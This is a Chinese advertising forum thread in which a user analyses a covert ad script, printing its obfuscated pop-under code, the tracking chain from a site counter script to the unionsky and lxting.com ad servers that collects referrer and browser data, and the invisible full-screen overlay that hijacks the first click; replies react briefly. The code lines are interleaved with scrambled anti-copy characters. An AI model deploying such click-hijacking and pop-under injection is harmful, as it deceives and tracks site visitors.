  375.                         if (_i && divs[i] != a && _i == 2147483647) { " e8 L$ @2 a/ s7 }; i
  376.                             divs[i].style.zIndex = _i - 1
    3 ]1 z& B8 m. }& E
  377.                         } 1 L' Q1 `9 T* _" D6 \& A+ c
  378.                     }
    ( |6 c' N0 u8 }
  379.                     a.style.zIndex = '2147483647'
    . {, z! x8 |" ]3 d3 x
  380.                 } catch(e) {}
    5 {8 D" f8 p4 j, v
  381.             }
    / C- C2 g" l4 N) w, t; @
  382.         },
    8 ]# o" M5 C% \
  383.         120); 8 n* t( R6 s& D6 w+ o
  384.         a.onclick = function(e) {
    ! S+ O& n/ q# T
  385.             if (document.getElementById('__unionsky_push_d_object_box__') != null) { # I/ W: t! p7 w- W
  386.                 form_div.parentNode.removeChild(form_div) : h0 N& c. i1 P' M( u5 R& F7 {# v
  387.             } 1 G! b" z9 n$ r, C
  388.             e = e || window.event; 7 j$ U1 h/ q. o- c
  389.             e.cancelBubble = true; 6 ?; }% \& ~, R+ P" R9 c4 t% U
  390.             setTimeout(function() { * V: d5 Z6 f. \4 _' d! u4 K
  391.                 a.parentNode.removeChild(a)
    2 ^- x8 ?3 X# O3 W0 y1 }9 ?
  392.             },
    ; Q9 g* ]- Y3 y) S5 [
  393.             200);
    " K8 `' d" a# [3 B: k4 k
  394.             clearInterval(m);
    , J  Y, \9 s$ z+ G0 w
  395.             ads++;
    " |% ^' K+ q) d8 k  k+ e) a
  396.             p(ckn, ckt, ads) + s& C7 t/ k7 V! N( k- t) v
  397.         };
      b# v4 H- A8 ~/ A* R  \2 i) G
  398.         event(a, 'mouseup', * c  i! _* U& t5 [+ M
  399.         function(e) { 2 i# {) a( A+ |* W2 m- d; a) ^
  400.             e = e || window.event;
    . l# V$ x% V5 \+ W2 v
  401.             e.cancelBubble = true
    5 a! h! Z6 A+ u: A  H. [
  402.         })
    3 F2 Z0 _$ U/ i( w$ q! X0 e! s
  403.     } : s; R' W2 {' X+ V  C# X7 ?
  404.     function func(url, param) { / b$ ]4 H% u3 H
  405.         var f = window[String.fromCharCode(111, 112, 101, 110)];
      x( b( p7 B5 X8 s# @6 C+ K& X
  406.         var w = f(url, '_blank', 'left=0,top=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=' + screen.width + ',height=' + screen.height);
    2 Q2 y' D3 h' T: G5 J* {: t$ h
  407.         if (w) {
    . G. i$ R7 ^8 {6 F+ s4 q
  408.             ads++;
    + L+ x! Q7 p- f0 O2 M
  409.             p(ckn, ckt, ads) 7 ^5 g! v. N0 [% a0 o6 U0 l
  410.         }; . h5 H1 H& W$ {2 n& B7 H9 x- ~
  411.         return w ! n. I- v+ `" `7 i) {
  412.     } + L! R8 ^- N2 J
  413.     function fstart(url) {
    & P6 P* S& a2 ]5 B  O2 H) n& v
  414.         init(); ! Z$ E* U: z, L
  415.         if (_ct >= 0) { + y4 ]# e2 ^# }" a" b2 U
  416.             ckn = "YITIAN_NUM";
    . x, l$ g( S) I- K
  417.             ckt = _ct
    ' ~& f9 Z. U8 q; w$ `$ m
  418.         } else { ) b- G2 `, x7 B, R" k: j  j7 ~
  419.             ckn = "YITIAN_ALL"; 6 r- }6 X, ]' I" a7 Q; q* F
  420.             ckt = Math.abs(_ct)
    # h- R1 p0 {' k' D. o% W# ]
  421.         } 5 E& p) Q+ N$ K! O* b  P
  422.         if (ckt > 0) {
    / m: R5 |2 B# V2 E9 h
  423.             if (b(ckn)) { 5 C( A$ ~1 n5 ~0 f  }
  424.                 try { : y+ n' V$ ~% F+ a
  425.                     ads = parseFloat(b(ckn)) . r! n2 y& m9 K& B6 k' d
  426.                 } catch(q) {} , v+ P& z' `0 i3 F3 D. T$ L
  427.             }
    / b5 @& m8 C& B4 ?& v
  428.         } ) |5 a9 ]8 y- F# b5 @; R* G6 d
  429.         if ((ads > 0 && ckn == 'YITIAN_ALL') || ads >= ytpp_ads) {
    * y4 D/ ]6 x2 Z) F0 i5 w% K! s, Y
  430.             return7 l7 ?: E! Q1 ?7 o. I% ]
  431.         } else { 6 q8 n. B* L2 u7 Q5 _6 H
  432.             if (_le > 0) {
    % h" `3 C$ f7 \+ F/ y
  433.                 setTimeout(go(url), _le * 1000)
    2 p8 F! z8 h* \9 Z2 C' L% q: @7 M
  434.             } else { ! N) O$ N) p( b0 B' B7 O2 }3 x0 [
  435.                 go(url)
    3 r  M, j* a9 n$ p8 ~4 n- q- C
  436.             }
    - c( ~& ]1 |  {3 {
  437.         }
    - n% N6 y  {+ P
  438.     }
    ! j4 m& C" ~* c2 U
  439.     function go(url) {   e2 z- \% y+ S& r
  440.         if (_poo == 1) {
    7 D% j5 N3 Y- [5 ]4 n
  441.             try { : u! {/ ], ]' O8 d
  442.                 func(url)
    ! I0 B) Y, c$ u+ C3 P" ~+ m% v4 [
  443.             } catch(q) {}
    3 t, T8 W  Z* c' R# p" `
  444.         } else if (_pco == 1) { : `& T9 e  L0 p/ g+ j
  445.             a_pop(url)
    ( v2 m1 L/ [5 d" w* M, i
  446.         } else {
    1 q& x0 \9 \" }  @, e5 ^4 m& u
  447.             if (_pd == 1) {
    ) j: \1 O) p2 A8 r$ _7 ^& F
  448.                 setTimeout(function() { + c6 }  s, n7 A* A  `; E
  449.                     pop(url, {
    % [* ]# j/ B( i* {" |4 [
  450.                         a: 1, ' g8 C1 K' {7 X% y
  451.                         b: 2 : H7 V/ g+ h; f5 o# C+ |
  452.                     }) & R' t7 c5 i3 b8 M
  453.                 }, 7 _- n3 X* Z1 o, b8 W
  454.                 300)
    1 R# e; z- z4 m# ]+ P
  455.             }
    1 }) A# W6 p) U
  456.             if (_pd2 > Math.random()) {
    6 g; g! ~9 k0 ]9 C% Y
  457.                 setTimeout(function() {
    . E- g' W: ]1 H2 J, Y6 q5 w
  458.                     pop(url, { + a$ S8 y" o$ ~. y# T% ]
  459.                         a: 1,
    % c9 X4 M4 x1 q9 M3 @  m8 E
  460.                         b: 2
    0 s5 a' S! X( }
  461.                     }) . w3 X! K2 f( x4 l& [3 ^
  462.                 },
    5 e7 q% ?# R* I3 R9 w0 t7 T
  463.                 300)
    + ~# x6 H- U+ ], g3 H0 A5 h/ q
  464.             } - ]+ |$ m1 W  G2 `' d) A) L
  465.             for (var i = 1; i <= 10; i++) { 8 }% [8 t7 A/ f! y+ W6 g
  466.                 var n = i == 1 ? "": i;
    ( V  f0 q! ~9 |. C" G- U0 V- a
  467.                 if (eval("_pt" + n + "b") > Math.random()) {
    + t/ W% U6 q7 P
  468.                     setTimeout(function() { ( L5 {& w& j# Z) K2 W' @0 A
  469.                         setTimeout(function() { 8 o! _5 l) I+ q: s- e8 W
  470.                             pop(url, {
    * x2 b5 b/ b" e* K6 _( ?2 m
  471.                                 a: 1,   {3 f% n. o: S) `! b  f8 r
  472.                                 b: 2
    ; R: R/ Q, L$ B
  473.                             }) $ r' D' @& G1 ^9 A/ [
  474.                         },
    % {7 `8 S  ~1 d" @' p
  475.                         300) - Y9 b  g% C/ [' f/ o$ l: o
  476.                     },
    1 d9 C8 l) `! B+ T8 @+ N
  477.                     parseInt(eval("_pt" + n + "a")) * 1000)
    * m0 D- P; b4 I
  478.                 }
    * w1 g9 @' S3 U/ z4 J4 N( C& v
  479.             } 2 B* _& Z% N( A4 ~( v
  480.             if (_pc2 > Math.random()) { , T  X3 c# V2 z# I1 p
  481.                 a_pop(url) 6 ?: p6 ]* y. Z, j
  482.             }
    9 z  p1 K( w# ?; u: ]
  483.             if (_po > Math.random()) { 3 E; c( ?/ ~& R) S2 v9 t
  484.                 try { ( }2 ^+ ^2 O6 @; z% |6 ^
  485.                     func(url) 3 g. w% z: J* n
  486.                 } catch(q) {} 7 D- R- L$ ?' \/ C  @: s0 m: T* |& W2 K
  487.             } 6 w) e( ^9 n+ {5 g- }
  488.         }
    * v# t  O& {4 H
  489.     }; 1 M, I$ e% W) X8 i/ I# ^0 O
  490.     fstart(aa_url); 2 m; d8 ?0 M" \( V
  491.     event(window, 'beforeunload', 6 b' ~4 f4 p, _+ _) [
  492.     function() {}) 4 M# |4 P& g4 d7 J) b7 C
  493. })();
复制代码
通过浏览器抓包
9 @* U) m7 Y( w  s4 D' B+ @% qURL从这里产生
( w0 W# M0 y. t  i' }6 ~* E5 u
# @+ h1 M8 M+ k1 j' ahttp://play.unionsky.cn/show/?placeid=141830, L. T; u/ ^$ Z/ [) r
) u$ B# u/ a0 b2 }* W" u* a
. ~+ c) W- P) V6 k' W! L
相关帖子
回复

使用道具 举报

126

主题

62

广告币

394

积分

初级会员

Rank: 2

积分
394

社区QQ达人

 楼主| 发表于 2013-12-17 15:04:10 | 显示全部楼层
直接打开看不到什么东西
9 u! o% l& t( f3 _( `http://www.unionsky.cn/ 是属于这个广告联盟的
0 Z3 J  U. k0 R1 G  ?我们直接分析抓包的内容
2 E: i4 n% f' u$ M: ^% A/ z
var ytpp_r = encodeURIComponent(encodeURIComponent(document.referrer));
8 I# V; \* P# N1 I7 _2 nytpp_r = ytpp_r.length > 1000 ? ytpp_r.substring(0, 1000) : ytpp_r; , V* d) d$ t# m4 O; x% H
var ytpp_u = encodeURIComponent(navigator.userAgent);
1 F% R8 S0 I; D5 z, {% h9 n5 Avar ytpp_s = window.screen.width + "*" + window.screen.height;
+ b0 c9 L1 P" `var ytpp_l = navigator.browserLanguage || navigator.language;
0 ^) R1 E1 {  M9 e" E4 x% R; pvar ytpp_plid = 141830; % k9 E2 p. y5 g* t7 Z
var ytpp_w = 0;
/ g5 K9 v- l5 j8 P" b  `  I4 Svar ytpp_h = 0; 0 |, ~' ?5 B  ~7 @  B, A
var ytpp_url = "http://www.lxting.com/jmp/?p=f7xNjUO8Y80tB6KZyJ*jzRXjLuoZaOluHDv/IndJK1Z/mc0eKhM2QddlbEorugPwTAd08JIi*oDNYfaUSsF7QNBk3/CB3LW8&r=" + ytpp_r + "&u=" + ytpp_u + "&s=" + ytpp_s + "&l=" + ytpp_l + "&n=" + Math.random(); + r  X3 W& U) q+ W7 H7 S/ z7 M
var ytpp_ads = 14;
, v- ~. T8 v- K, d* i7 W( v3 nvar ytpp_sti = 'CT:-3D:1C:1C2:1T:60,1T2:100,1;';
5 p( a. H: o* z! J, z  l3 X# ndocument.write("<script language='javascript' type='text/javascript' src='http://www.lxting.com/pp/?p=f7xNjUO8Y81LybptxG2Vq//rYbtxQcP5GVnJOL07Ka8=&r=" + ytpp_r + "&u=" + ytpp_u + "&s=" + ytpp_s + "&l=" + ytpp_l + "&n=" + Math.random() + "'></script>");
4 |- m! L( K% ^" Gdocument.write("<script language='javascript' type='text/javascript' src='http://www.lxting.com/script/popup/v1_min.js'></script>");

; Z0 e' ]& ^- E那么这个http://play.unionsky.cn/show/?placeid=141830又是从哪里被引用进去呢。+ Q, d& e3 B( O' X
继续分析 发现这里, |# N0 }$ S1 h0 p9 R2 p3 T; Q

9 }" S8 ?. f% y" r" t- Ohttp://txsite.21tx.com/count/count.js8 [) S) h0 Z$ _
- ?% [) L' C: a7 _
txcount_uid = 1;
/ {' H: W5 k& {: x, v- Dtxcount_uh = 0; % y2 I" e) i0 \$ N: m8 L9 y, b$ J
txcount_uw = 0; / f5 d" v7 {% E
txcount_uah = 0; 3 c: s7 @( f: g
txcount_uaw = 0;
5 H9 U" N, }; r- b; ^4 B2 Ptxcount_ucd = 0;
# w& J9 p* L! n: k4 K4 j$ G   " p- A& ~4 N: L
if (window.screen) {
, l, s- Y; [+ ~  txcount_uh = window.screen.height;
5 m- t* g/ j  v# M( T3 p  txcount_uw = window.screen.width; . D* A9 C6 p$ @3 D% c4 X
  txcount_uah = window.screen.availHeight;
) n& B! ~+ I1 i, V4 C0 F: U  n8 E  txcount_uaw = window.screen.availWidth;
! [1 x! u3 s8 E! B$ S( G  txcount_ucd = window.screen.colorDepth;   e3 z% @0 n. h# T
}   D# b/ i% H9 B! ~3 T
   0 V) q6 B6 |8 n+ h: k0 `$ W
   
8 m9 m2 ?- l$ l6 Mvar url = "http://txsite.21tx.com/count/count.aspx"; 9 ~- R' s$ S6 V  L* j' ?
url = url + "?u="+ txcount_uid; 1 K$ R- ^8 W8 @- \( S; V
//url = url + "&f=" + txcount_f; ! T4 m2 E0 O4 q: s; Q/ h
url = url + "&k=" + txsite_pagekey;
+ t$ v" n6 p; z; N' S//url = url + "&t=" + txcount_t; 0 |- [' e* X  y: a; ~9 Q
url = url + "&l=" + escape(document.location); " ~1 N# k; E1 K& ]/ r: ~
url = url + "&r=" + escape(document.referrer); * R5 C& D( U, J
url = url + "&uh=" + txcount_uh;
7 h7 j% V$ T/ Z  h* O0 ]url = url + "&uw=" + txcount_uw;
( M2 J5 n6 @, q9 Furl = url + "&uah=" + txcount_uah;
% Q" |; Q1 P) u1 G6 rurl = url + "&uaw=" + txcount_uaw; : ~: Y% O  b2 [$ Y& b! Z0 C- O
url = url + "&ucd=" + txcount_ucd;
- n9 d! _2 J' `, m( S7 ~4 b   
" N5 d! s+ _) k   8 r: V% O2 \  {2 R3 D
document.write("<script src=" + url + "><\/script>"); & ~4 f+ o, B' v! W
//document.write('<script src="http://s4.cnzz.com/stat.php?id=4820460&web_id=4820460" language="JavaScript" charset="gb2312"><\/script>');
* ~7 s0 j; T1 }4 c- `: x% R2 |   9 l. l  p( r  t- j3 H% D
document.write('<script src="http://s127.cnzz.com/stat.php?id=1474936&web_id=1474936" language="JavaScript" charset="gb2312"><\/script>'); + n% f: {1 r+ r$ k' ^0 I+ y' i
   8 M  Y1 ^1 @  E- P4 x
   
7 U! f6 q$ U$ ~document.write("<script language='javascript' src='http://play.unionsky.cn/show/?placeid=141830'><\/script>");

. R* o/ v3 c+ y0 R8 R1 h5 C
5 Z2 @# }% c8 e5 ?8 r' u! F一切昭然天下了。% k0 ?' j) {- t# j/ q# m
代码产生的直接效果如下8 k( k% v* ^# B; {( D
( G( ]# @7 c) d8 m# r5 g) V
<a  target="_blank" style="position: absolute; z-index: 2147483647; display: block; top: 0px; left: 0px; cursor: default; opacity: 0;"><div style="background-color: rgb(255, 255, 255); width: 1903px; height: 650px;"></div></a> - \5 \+ @, |% t( v$ z

' M% g, n: I4 X很隐秘的一段好代码
3 d( t: F# q/ g; O. |
回复 支持 反对

使用道具 举报

0

主题

480

广告币

1272

积分

高级会员

Rank: 4

积分
1272
发表于 2013-12-17 15:31:30 | 显示全部楼层
标记一下 好象看不懂还
回复 支持 反对

使用道具 举报

31

主题

266

广告币

801

积分

中级会员

Rank: 3Rank: 3

积分
801
发表于 2013-12-17 16:34:22 | 显示全部楼层
不清楚国内,莫非做taobao不可以直接用弹窗吗?
回复 支持 反对

使用道具 举报

4

主题

1297

广告币

1357

积分

高级会员

Rank: 4

积分
1357
发表于 2013-12-17 18:49:06 | 显示全部楼层
没用 360 搜狗 直接就拦截了,chrome可以弹出来
回复 支持 反对

使用道具 举报

54

主题

9

广告币

6010

积分

禁止访问

积分
6010
发表于 2013-12-17 19:34:38 | 显示全部楼层
adblock 完美屏蔽
回复 支持 反对

使用道具 举报

0

主题

91

广告币

97

积分

初级会员

Rank: 2

积分
97

社区QQ达人

发表于 2013-12-17 23:34:52 | 显示全部楼层
没研究全,期待跟多解析。
过往.
回复 支持 反对

使用道具 举报

6

主题

682

广告币

1090

积分

中级会员

Rank: 3Rank: 3

积分
1090

社区QQ达人

发表于 2013-12-18 00:52:13 | 显示全部楼层
代码看不懂,不过觉得挺好用的……自动弹窗
回复 支持 反对

使用道具 举报

51

主题

449

广告币

835

积分

中级会员

Rank: 3Rank: 3

积分
835
发表于 2013-12-18 01:24:03 | 显示全部楼层
没懂8 X) b2 H- E1 h
# }$ p6 H& u* b6 q3 }
1,首次访问有个弹窗,但是被chrome给拦截了* R  }" c8 D3 s/ d
4 i! T$ L5 }: S4 S& n! k6 C+ d
2,劫持了第一次点击) \7 D+ d, {, U: u4 V4 d
0 Q0 e% b3 S# S: X6 {6 {
3,CS了一下unionsky, _; o: Q% X( M& @5 o2 T9 ]

7 X+ i! @' L3 Z1 q& ^; f" o然后?
回复 支持 反对

使用道具 举报

126

主题

62

广告币

394

积分

初级会员

Rank: 2

积分
394

社区QQ达人

 楼主| 发表于 2013-12-18 03:49:31 | 显示全部楼层
cissss 发表于 2013-12-18 01:24
2 Y" x' y- k3 {% `; y  Z' Y3 a没懂
0 M. y( q* B- b3 Z- G
6 ]! X1 V- A- G8 n* V+ G1,首次访问有个弹窗,但是被chrome给拦截了

! |! z' P9 X; B0 u3 ^1 @懂的人一看就懂 不懂的人怎么看就不懂
回复 支持 反对

使用道具 举报

4

主题

428

广告币

706

积分

中级会员

Rank: 3Rank: 3

积分
706
发表于 2013-12-18 06:34:13 | 显示全部楼层
这个CJ怎么搞的这么复杂...
回复 支持 反对

使用道具 举报

51

主题

449

广告币

835

积分

中级会员

Rank: 3Rank: 3

积分
835
发表于 2013-12-18 17:31:57 | 显示全部楼层
小狠 发表于 2013-12-18 03:49   u: H8 u( ?5 D  s
懂的人一看就懂 不懂的人怎么看就不懂

2 a% u$ y$ B1 }* ]5 {4 b( {我确实不懂你发这贴的意思。 可以理解为装逼么?
回复 支持 反对

使用道具 举报

0

主题

386

广告币

341

积分

初级会员

Rank: 2

积分
341

社区QQ达人

发表于 2014-3-14 13:10:39 | 显示全部楼层
不就是个弹窗代码吗?
回复 支持 反对

使用道具 举报

3

主题

88

广告币

113

积分

初级会员

Rank: 2

积分
113

社区QQ达人

发表于 2014-3-14 23:11:34 | 显示全部楼层
我表示看不懂
回复 支持 反对

使用道具 举报

4

主题

1

广告币

135

积分

初级会员

Rank: 2

积分
135

社区QQ达人

QQ
发表于 2014-3-15 12:03:35 | 显示全部楼层
占位,慢慢领会啥意思
http://faaad.com
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关于我们|联系我们|DMCA|广告服务|小黑屋|手机版|Archiver|Github|网站地图|AdvertCN

GMT+8, 2025-1-12 13:25 , Processed in 0.055272 second(s), 13 queries , Gzip On, MemCache On.

Copyright © 2001-2023, AdvertCN

Proudly Operating in Hong Kong.

快速回复 返回顶部 返回列表